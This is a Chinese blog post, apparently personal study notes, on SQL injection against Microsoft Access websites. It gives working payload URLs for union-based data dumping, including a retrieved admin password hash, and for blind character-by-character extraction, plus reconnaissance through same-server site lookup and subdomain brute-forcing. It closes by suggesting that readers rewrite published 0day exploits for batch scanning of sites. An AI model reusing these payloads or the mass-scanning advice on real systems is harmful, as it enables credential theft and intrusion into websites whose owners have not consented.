• Sql注入基础_access注入


    1.access注入攻击片段-联合查询

    2.access注入攻击片段-逐字猜解法

    3.Access偏移注入(表名和列名猜解成功率不是百分百,猜解不到

    access注入攻击片段-联合查询法

    判断注入

    猜解表名

    猜解列名

    猜解数据

    Order by 22 22 代表查询的列名的数目有22

    http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

    http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误



    猜解表名 确定存在admin表名

    http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

    爆出3,5

     

     

    名称: 3
    介绍: 15

     


    猜解列名 猜解数据(在3和15位置上填入可能存在的列名)

    http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

    1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin

     

    爆出帐号密码

     

    名称: a48e190fafc257d3
    介绍: admin

     

     

    2.access注入攻击片段-逐字猜解法

    查表:and exists (select * from 表名)

    查列:and exists (select 列名from 表名)

    查数据:1.确定长度 2.确定asc数据(asc编码)

    and (select top 1 len(列名) from admin)=5

    and (select top 1 asc(mid(列名,位数,1)) from admin)=97

    and (select top 1 asc(mid(列名,位数,1)) from admin)=97



    Admin

    Adminpassword

    Admin列名长度为5

    Password 列名长度为16

    3.access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名

     https://www.cnblogs.com/habi/articles/7837565.html

    旁注查询,子域名查询


    旁注查询:同服务器下不同的站点,寻找查询接口

    http://dns.aizhan.com/www.whxy.net/


    子域名查询:

    分为二级或三级域名,可能存在同服务器或同网段

    搜索引擎查询,暴力猜解(layersubDomainsBrute等)

    www.0day5.com,可以上这个网站看看最新的oday ,改写里面的exp改成批量扫描的,批量扫站

     

     

     

     

  • 相关阅读:
    二分匹配最大匹配的理解(附图解)
    poj2060Taxi Cab Scheme(二分图匹配)
    codeforce Pashmak and Buses(dfs枚举)
    UVAoj 348
    poj2253 Frogger(最短路变型或者最小生成树)
    ZZUOJ1196: 单调数
    hdu3339 In Action(Dijkstra+01背包)
    ZZUOJ 1199 大小关系(拓扑排序,两种方法_判断入度和dfs回路判断)
    hdu 1241 Oil Deposits (一次dfs搞定有某有)
    POJ 2312Battle City(BFS-priority_queue 或者是建图spfa)
  • 原文地址:https://www.cnblogs.com/cui0x01/p/8620411.html
Copyright © 2020-2023  润新知